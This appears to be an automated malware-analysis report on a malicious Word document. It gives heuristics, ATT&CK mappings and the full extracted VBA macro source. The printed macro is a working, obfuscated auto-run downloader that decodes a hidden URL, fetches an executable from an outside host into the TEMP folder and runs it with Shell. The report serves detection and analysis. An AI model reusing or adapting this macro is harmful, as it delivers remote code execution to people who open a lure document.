MALICIOUS
334
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample contains heavily obfuscated VBA macros, including AutoOpen and Auto_Open functions, designed to execute arbitrary code. Critical heuristics indicate potential shell calls and the use of CreateObject, suggesting the macro's intent is to download and execute a second-stage payload. The presence of the email address 'facepa1m@live.ru' within the document body suggests a potential phishing lure.
Heuristics 12
-
ClamAV: Doc.Downloader.Generic-6698421-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
-
VBA macros detected medium 8 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
AMFWHTUYDGU = Shell(TAYOMJZUJZZ, 1) -
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
Set NNIGOCVDPLT = CreateObject(StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("534D")) + "XML2.XMLHTT" + "P") -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set NNIGOCVDPLT = CreateObject(StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("534D")) + "XML2.XMLHTT" + "P") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Sub Workbook_Open() -
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Sub Auto_Open() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
RYLOPYULCVL StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("6578652E312F736A2F6D6F632E73797373766A2F2F3A70747468")), Environ("TEMP") & "\ZDDVXCJSDDG.exe" -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 16428 bytes |
SHA-256: 856e4c644834332e9e1dee5220cb0e76147b5d172630154e61f6624fd4a8eb44 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
94 of 181 identifiers look randomly generated (e.g. 'A7871686E646C6B6F617467716D746C7971666C6') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Auto_Open()
GoTo ibrsmldpiphvsvwtvyuuximekdmojyu
Dim ijxwelbngrcwemofxtwsdvvljohusij As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("776A67666C61737A6F6A74676965676A7569646F6E6F626F6B67637670776A")) For Binary As #8624
Put #8624, , ijxwelbngrcwemofxtwsdvvljohusij
Close #8624
ibrsmldpiphvsvwtvyuuximekdmojyu:
GoTo murzwtryocwwumtzpfxbwmxihpwuqqf
Dim ndsvuypscucexedgfdqdkstaacybklq As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("6D696E756473766E6F6E757A6C726669656978736B6C76666D6E796F776273")) For Binary As #57666
Put #57666, , ndsvuypscucexedgfdqdkstaacybklq
Close #57666
murzwtryocwwumtzpfxbwmxihpwuqqf:
GoTo vhhzkdybkmwajfdpgxnvpwohkahzybc
Dim cvdugfhoapuijmmbdpkxglgsmoleyzo As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("62796D7A7869727367776D666A787071747A66697362676C6F637875696169")) For Binary As #92375
Put #92375, , cvdugfhoapuijmmbdpkxglgsmoleyzo
Close #92375
vhhzkdybkmwajfdpgxnvpwohkahzybc:
LEHSCRUYAOP
End Sub
Sub AutoOpen()
GoTo vjtgddkgwyjyxfwyejhjwunmusyqkpe
Dim rouegrbtflfuxsrebbukbwepgrszrwn As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("636F6F6D7671776777707A69787766767373696D796178736470786B667A7A")) For Binary As #45941
Put #45941, , rouegrbtflfuxsrebbukbwepgrszrwn
Close #45941
vjtgddkgwyjyxfwyejhjwunmusyqkpe:
GoTo ydpypmjvhtaujgzwjhvouijzmcvqzsd
Dim rziwiabonhhgkaiygfhisyzuorasxbn As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("65656565637A6E6E747774786D6278746968626767656F677A61647975636D")) For Binary As #65273
Put #65273, , rziwiabonhhgkaiygfhisyzuorasxbn
Close #65273
ydpypmjvhtaujgzwjhvouijzmcvqzsd:
GoTo spyufbgiichhxxetjeljbgehetpcpnj
Dim wasssygzauujydnbpxyfsxzkxjukfqa As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("72716666616468696C6A61616364677068716177776A63696F6167646C6B65")) For Binary As #42344
Put #42344, , wasssygzauujydnbpxyfsxzkxjukfqa
Close #42344
spyufbgiichhxxetjeljbgehetpcpnj:
Auto_Open
End Sub
Sub Workbook_Open()
GoTo kfhulilxxrlwhwfixhhvpioommyolqt
Dim vahdtdgblgyapwfvzzbgnsucganhczc As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("676262736464736D6D7479626B67636476716E7478716A74636574676D6461")) For Binary As #44864
Put #44864, , vahdtdgblgyapwfvzzbgnsucganhczc
Close #44864
kfhulilxxrlwhwfixhhvpioommyolqt:
GoTo bnnlkizctdcsqamhtszztldjcrnfalh
Dim tqailmqfkvpdlnadmofxsgunwbrthap As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("76616F636964777A716A746D6776686D73716D72757574746E797869617165")) For Binary As #45511
Put #45511, , tqailmqfkvpdlnadmofxsgunwbrthap
Close #45511
bnnlkizctdcsqamhtszztldjcrnfalh:
GoTo rzyzsruripsusweqdwfixdmwpmptcrn
Dim rfcftrwpgtofwtzmswndflvkoybeiyy As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("6E6E6D7A6E616A696B776F707068776F6B627A657169646D75716C73777573")) For Binary As #43709
Put #43709, , rfcftrwpgtofwtzmswndflvkoybeiyy
Close #43709
rzyzsruripsusweqdwfixdmwpmptcrn:
Auto_Open
End Sub
Function RYLOPYULCVL(ByVal DSTVHKMVLII As String, ByVal TAYOMJZUJZZ As String) As Boolean
Dim NNIGOCVDPLT As Object, NSSEPFVGSEO As Long, JELQAMLLIMM As Long, EEGMAWJZHTW() As Byte
GoTo gblmtxdykfjfnyhycuhyvwfnblizyhc
Dim etenctnjvvghquqrjcmnfpanmfemhwx As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("796C786F7976636875696776786D61667065786463746F626E666170786F6C")) For Binary As #94304
Put #94304, , etenctnjvvghquqrjcmnfpanmfemhwx
Close #94304
gblmtxdykfjfnyhycuhyvwfnblizyhc:
GoTo algoxrqkurpvrjhsmitxneerxocebwr
Dim oubhfcyqzjxwizngnlfdbwfpttwemgw As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("696D777A637261706472706564777969727472776B65766161747068657A72")) For Binary As #68449
Put #68449, , oubhfcyqzjxwizngnlfdbwfpttwemgw
Close #68449
algoxrqkurpvrjhsmitxneerxocebwr:
GoTo auwdcnhqqljcqqlyiwpbfraejhdsenf
Dim ndahamwvtdobycbmdqkdayzcskjqqbq As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("70657A6D656866776470706E6564736E7875787469636E666B736663626177")) For Binary As #60306
Put #60306, , ndahamwvtdobycbmdqkdayzcskjqqbq
Close #60306
auwdcnhqqljcqqlyiwpbfraejhdsenf:
Set NNIGOCVDPLT = CreateObject(StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("534D")) + "XML2.XMLHTT" + "P")
GoTo ybokqwyznhamrculzezmyxwgnllkdrs
Dim geskfxulknpykdnaosbxirplqjxswsg As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("7A7871686E646C6B6F617467716D746C7971666C61667778797578616F7263")) For Binary As #45311
Put #45311, , geskfxulknpykdnaosbxirplqjxswsg
Close #45311
ybokqwyznhamrculzezmyxwgnllkdrs:
GoTo demzkwijxqxzqomgljbzsnuronduwys
Dim eprhhdiwffgxfmttxudigyvtaoasvmx As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("7470646D7863676A6A78787167756A636A6F716E7263796474766765686267")) For Binary As #43044
Put #43044, , eprhhdiwffgxfmttxudigyvtaoasvmx
Close #43044
demzkwijxqxzqomgljbzsnuronduwys:
GoTo ewrintjkqejgdjqyslrujarhwichvlx
Dim pvkcujoolhwzonhpmiehmruziboswof As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("7879706D676B6B6B7A706878697A6477776C706A6477766470626573747679")) For Binary As #3259
Put #3259, , pvkcujoolhwzonhpmiehmruziboswof
Close #3259
ewrintjkqejgdjqyslrujarhwichvlx:
NNIGOCVDPLT.Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("544547")), DSTVHKMVLII, False
GoTo cuxtufdwnlvdgjpgwjappxcvyizkdxs
Dim xfwixglnddkfqpkucgubivyhqpbuapk As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("777967667A716F65646A6F62626863647073787878786E7163627366636679")) For Binary As #23644
Put #23644, , xfwixglnddkfqpkucgubivyhqpbuapk
Close #23644
cuxtufdwnlvdgjpgwjappxcvyizkdxs:
GoTo mcxxmyuxzhdbopxreudavtfcuzmzcqz
Dim nhsgrywskmzrscddqubegpspylgoiwq As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("6C6A746577756F676877726475757069717A73706B6863686E717766717369")) For Binary As #81586
Put #81586, , nhsgrywskmzrscddqubegpspylgoiwq
Close #81586
mcxxmyuxzhdbopxreudavtfcuzmzcqz:
GoTo pmkfrhqoxulznkgihfmyvgfegwkczzf
Dim qqlwtumayqhcngjtixquqaigzcchnei As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("6B6E62716A776A6B787975647A75766571786D686673757A78746B6465796E")) For Binary As #86334
Put #86334, , qqlwtumayqhcngjtixquqaigzcchnei
Close #86334
pmkfrhqoxulznkgihfmyvgfegwkczzf:
NNIGOCVDPLT.Send "send request"
GoTo mszwztmxpannjexlvifpivjjpxjkttz
Dim kryiwjwgixdtcfuecndllllzbsdfdcf As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("70786C7A666879626C7264796D6B626A6D7670737662786C626963676E6277")) For Binary As #48865
Put #48865, , kryiwjwgixdtcfuecndllllzbsdfdcf
Close #48865
mszwztmxpannjexlvifpivjjpxjkttz:
GoTo cwcbcfpemtssitplnhmanezreurzwia
Dim rcbhvrlxzknduwxjwcqsrkjgsaafukt As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("62646B68646B7A6E6973737A6E6E696F65756274716D67707A64786F79646C")) For Binary As #66681
Put #66681, , rcbhvrlxzknduwxjwcqsrkjgsaafukt
Close #66681
cwcbcfpemtssitplnhmanezreurzwia:
Do While NNIGOCVDPLT.readyState <> 4
GoTo qvwvdutdgquzyqkbyhxcnuniajoqhau
Dim iljszkbtdfzkgsfsrtzeosaghtthzqn As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("7378746D6B6C716D757A6F716B68757865756963726C656B676C626E797466")) For Binary As #60416
Put #60416, , iljszkbtdfzkgsfsrtzeosaghtthzqn
Close #60416
qvwvdutdgquzyqkbyhxcnuniajoqhau:
GoTo wjslwfcbkbyvlednhyocdiuvvxgqxns
Dim lzoeugseeimbtbplitjampkjovlopbk As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("6C787862706B6E736F61796F6B7A696E6B756375756B76796169656A6A6771")) For Binary As #63024
Put #63024, , lzoeugseeimbtbplitjampkjovlopbk
Close #63024
wjslwfcbkbyvlednhyocdiuvvxgqxns:
GoTo kdypjoldwojbtsryvfnntfwzzrjtzdd
Dim tvawleusyqmrzrbkxqrsqkfjpcafthi As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("6363756F66687469626F7867706A66776366777A64796B7A6E6B6F636E6167")) For Binary As #24735
Put #24735, , tvawleusyqmrzrbkxqrsqkfjpcafthi
Close #24735
kdypjoldwojbtsryvfnntfwzzrjtzdd:
DoEvents
GoTo iehqukurutolewdmpakxyzyvzagmdem
Dim kckioohclkyqwkgvfoocsusuqeoqkfr As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("7567707177776C6D697561707764716371646278746E676E6A6D706D726A72")) For Binary As #44320
Put #44320, , kckioohclkyqwkgvfoocsusuqeoqkfr
Close #44320
iehqukurutolewdmpakxyzyvzagmdem:
GoTo yzegjneiipwavdezkhsjkwqvakoenmr
Dim glxhalrjmrsuoqcejchaqfisrjghhuy As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("76796E6B6E7A6F69636275797673646B6D687A71626F74766163637A6E6567")) For Binary As #64472
Put #64472, , glxhalrjmrsuoqcejchaqfisrjghhuy
Close #64472
yzegjneiipwavdezkhsjkwqvakoenmr:
GoTo vbjxidrncximwsfntjwcsqsdirlerox
Dim eunyfrncxtddsocwnxllpbgznmxubft As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("687666747967647279666C646578656F74776C6877676874766A6478697867")) For Binary As #34647
Put #34647, , eunyfrncxtddsocwnxllpbgznmxubft
Close #34647
vbjxidrncximwsfntjwcsqsdirlerox:
Loop
GoTo reucwrttgtkyjlruevyufsqksechxjb
Dim fvodecfvnkguhhyrbrmiobvmovlumnw As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("6B686763667A62726368746D676D66626668736D756D75656C64736E6A6E71")) For Binary As #62517
Put #62517, , fvodecfvnkguhhyrbrmiobvmovlumnw
Close #62517
reucwrttgtkyjlruevyufsqksechxjb:
GoTo hgrrkksmwrkdvmtizvejxjcuuohcdom
Dim fcwlhqpzfhrovcwcoxxhjhqwklltfyx As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("63796C737668647270796E73686E6B7A6C636469776564626C6171636B6F61")) For Binary As #67641
Put #67641, , fcwlhqpzfhrovcwcoxxhjhqwklltfyx
Close #67641
hgrrkksmwrkdvmtizvejxjcuuohcdom:
GoTo pnijwjwmexjjhntyjspuiovtnbmogrz
Dim kilabocvwrplvuhapiifkhmgjwecume As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("6E76756D6B72706E7A7A78716770677A6B797265656A69616277657A777273")) For Binary As #97559
Put #97559, , kilabocvwrplvuhapiifkhmgjwecume
Close #97559
pnijwjwmexjjhntyjspuiovtnbmogrz:
EEGMAWJZHTW = NNIGOCVDPLT.responseBody
GoTo lrmkgiwuxtncahvjhovwzqgpwvrersc
Dim nbsyjaabykcvadnfiljwjhowmkacizl As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("6D6B756D65766574637A726E696676737370646A7A6D7569766E616A676474")) For Binary As #46976
Put #46976, , nbsyjaabykcvadnfiljwjhowmkacizl
Close #46976
lrmkgiwuxtncahvjhovwzqgpwvrersc:
GoTo gosurlkryjpfsedsgcaeplynexqfaih
Dim faqnmqdpdalpeywofccbayecwqyscpc As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("727677656E66707469776771656C72637771746D726769786F756973717765")) For Binary As #74704
Put #74704, , faqnmqdpdalpeywofccbayecwqyscpc
Close #74704
gosurlkryjpfsedsgcaeplynexqfaih:
GoTo tnaphekasxbracbhabmwjmonjlibvko
Dim doproczbmrquoruieennbtxuycdsjxq As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("756D736675756A6D7A6B7A6C6F636E62686172707568696A656A71616C6968")) For Binary As #9363
Put #9363, , doproczbmrquoruieennbtxuycdsjxq
Close #9363
tnaphekasxbracbhabmwjmonjlibvko:
JELQAMLLIMM = FreeFile
GoTo wqczbykyaihoqbptdjhisthkgftskdq
Dim qpddwudcywchzmmfsjadwzdgfppmdfm As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("657265756877706E6F626573736377707173677277756271637A6970727870")) For Binary As #53143
Put #53143, , qpddwudcywchzmmfsjadwzdgfppmdfm
Close #53143
wqczbykyaihoqbptdjhisthkgftskdq:
GoTo yapjcmybpddymczraoqlpnpseljuwmd
Dim gwxtblghrvminpxqelzqjxgzazxmyou As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("68687466686C7476716C65626666706B626C61616279746D6D6A6F6862757A")) For Binary As #47397
Put #47397, , gwxtblghrvminpxqelzqjxgzazxmyou
Close #47397
yapjcmybpddymczraoqlpnpseljuwmd:
GoTo iotwhlpzobqctfwowrybakbsgdzfywu
Dim yqekfwqtwiywymlvqwbvrhwvvpvcujw As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("6E786A686F6D666A677362616F676D636C6768657463666168777965657773")) For Binary As #91745
Put #91745, , yqekfwqtwiywymlvqwbvrhwvvpvcujw
Close #91745
iotwhlpzobqctfwowrybakbsgdzfywu:
If Dir(TAYOMJZUJZZ) <> StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("")) Then Kill TAYOMJZUJZZ
Open TAYOMJZUJZZ For Binary As #JELQAMLLIMM
Put #JELQAMLLIMM, , EEGMAWJZHTW
Close #JELQAMLLIMM
GoTo vxjrzdxnqwpmfofakpbrgotwdmpofux
Dim gjdoqxhqlfvtzqmghavdvfinkjytobf As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("73796A74776E706379667A7476636C6C6967796161716575697A64647A676F")) For Binary As #30762
Put #30762, , gjdoqxhqlfvtzqmghavdvfinkjytobf
Close #30762
vxjrzdxnqwpmfofakpbrgotwdmpofux:
GoTo rabrjsabaubpqxnkburptddzdyuhjby
Dim rhvdaswbmwzpbtbflitwkrgggycznsy As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("797A7068767778777166657676707371767361696D6161646A6F6971766F6C")) For Binary As #34181
Put #34181, , rhvdaswbmwzpbtbflitwkrgggycznsy
Close #34181
rabrjsabaubpqxnkburptddzdyuhjby:
GoTo seuirbdohiegmorzubxhjfcfxmctiph
Dim axvambbbzwdplxzwybuouqpmzyseexv As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("63756C686A7676727673766B6B76626E7370716D69696C647770626D676970")) For Binary As #51651
Put #51651, , axvambbbzwdplxzwybuouqpmzyseexv
Close #51651
seuirbdohiegmorzubxhjfcfxmctiph:
Dim AMFWHTUYDGU
GoTo siykjbrigwkhtweusncbatbtbadslvj
Dim qdqrvubsfgezddkzmjxtpmasdknbbgu As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("686767746D727A676D667278707964796F63616C6A6C6A67716D6C61787272")) For Binary As #14433
Put #14433, , qdqrvubsfgezddkzmjxtpmasdknbbgu
Close #14433
siykjbrigwkhtweusncbatbtbadslvj:
GoTo zrzovzwlmqsjmexecbrlhyhkkxesxhb
Dim dxjfxewrlfekpzkxkjohqgrqitlthio As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("76766D6B71736B716B767A6B66637A66646965657878797979796161736665")) For Binary As #54969
Put #54969, , dxjfxewrlfekpzkxkjohqgrqitlthio
Close #54969
zrzovzwlmqsjmexecbrlhyhkkxesxhb:
GoTo jjbempzqaiswlwxqqdpodmhjiahbvmo
Dim hugcrpyuywonptsmkdtfwhdduuecosl As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("6D686A68637162636B73757566756966736C636A6379646F676E6662676D74")) For Binary As #6392
Put #6392, , hugcrpyuywonptsmkdtfwhdduuecosl
Close #6392
jjbempzqaiswlwxqqdpodmhjiahbvmo:
AMFWHTUYDGU = Shell(TAYOMJZUJZZ, 1)
GoTo qadpifenldzcxpfdxtifljrrzzbcsxa
Dim aegmorsksvivzugmhgafcdmglgehjrt As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("6E686D756D6F6471796E62677673656C6F72676A6D75627273776167696C69")) For Binary As #79239
Put #79239, , aegmorsksvivzugmhgafcdmglgehjrt
Close #79239
qadpifenldzcxpfdxtifljrrzzbcsxa:
GoTo esgjrteacoiipfdndlofnculesukskf
Dim ocintjpmmqljnytisygjzmlcwwqbcwp As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("677A677463646D75626678686A66776A626F77726E756B7465657A79616261")) For Binary As #65457
Put #65457, , ocintjpmmqljnytisygjzmlcwwqbcwp
Close #65457
esgjrteacoiipfdndlofnculesukskf:
Set NNIGOCVDPLT = Nothing
GoTo eunyfrncxtddsocwnxllpbgznmxubft
Dim damvgvyfykmfsyvkwezqjzortwkmsca As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("6579787163626B6968756C77796C6969716565726C6D716C747A7461726270")) For Binary As #90707
Put #90707, , damvgvyfykmfsyvkwezqjzortwkmsca
Close #90707
eunyfrncxtddsocwnxllpbgznmxubft:
GoTo idtllvxvbahecjyyqkpkcrcsliyzbfi
Dim nyltnuhkvzqaenqpkupbtnnutbwuerm As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("64626A71676F6F7774697463686C77656F726274646E677372756665697A77")) For Binary As #91592
Put #91592, , nyltnuhkvzqaenqpkupbtnnutbwuerm
Close #91592
idtllvxvbahecjyyqkpkcrcsliyzbfi:
GoTo odnmfkcjazszslcqzarqhtomxrnskql
Dim mweesncwwywxcilphqohqfnsfgctpxd As String
Open StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("736A6A746D6973646666757875736F72747A766E676A656264737663696577")) For Binary As #46976
Put #46976, , mweesncwwywxcilphqohqfnsfgctpxd
Close #46976
odnmfkcjazszslcqzarqhtomxrnskql:
End Function
Sub LEHSCRUYAOP()
RYLOPYULCVL StrReverse(podiykbwptwurwktgjtmxbhmqedkhno("6578652E312F736A2F6D6F632E73797373766A2F2F3A70747468")), Environ("TEMP") & "\ZDDVXCJSDDG.exe"
End Sub
Public Function podiykbwptwurwktgjtmxbhmqedkhno(ByVal jhgfddfghfukdfg As String) As String
Dim pgnfsrhgrherth As Long
For pgnfsrhgrherth = 1 To Len(jhgfddfghfukdfg) Step 2
podiykbwptwurwktgjtmxbhmqedkhno = podiykbwptwurwktgjtmxbhmqedkhno & Chr$(Val("&H" & Mid$(jhgfddfghfukdfg, pgnfsrhgrherth, 2)))
Next pgnfsrhgrherth
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.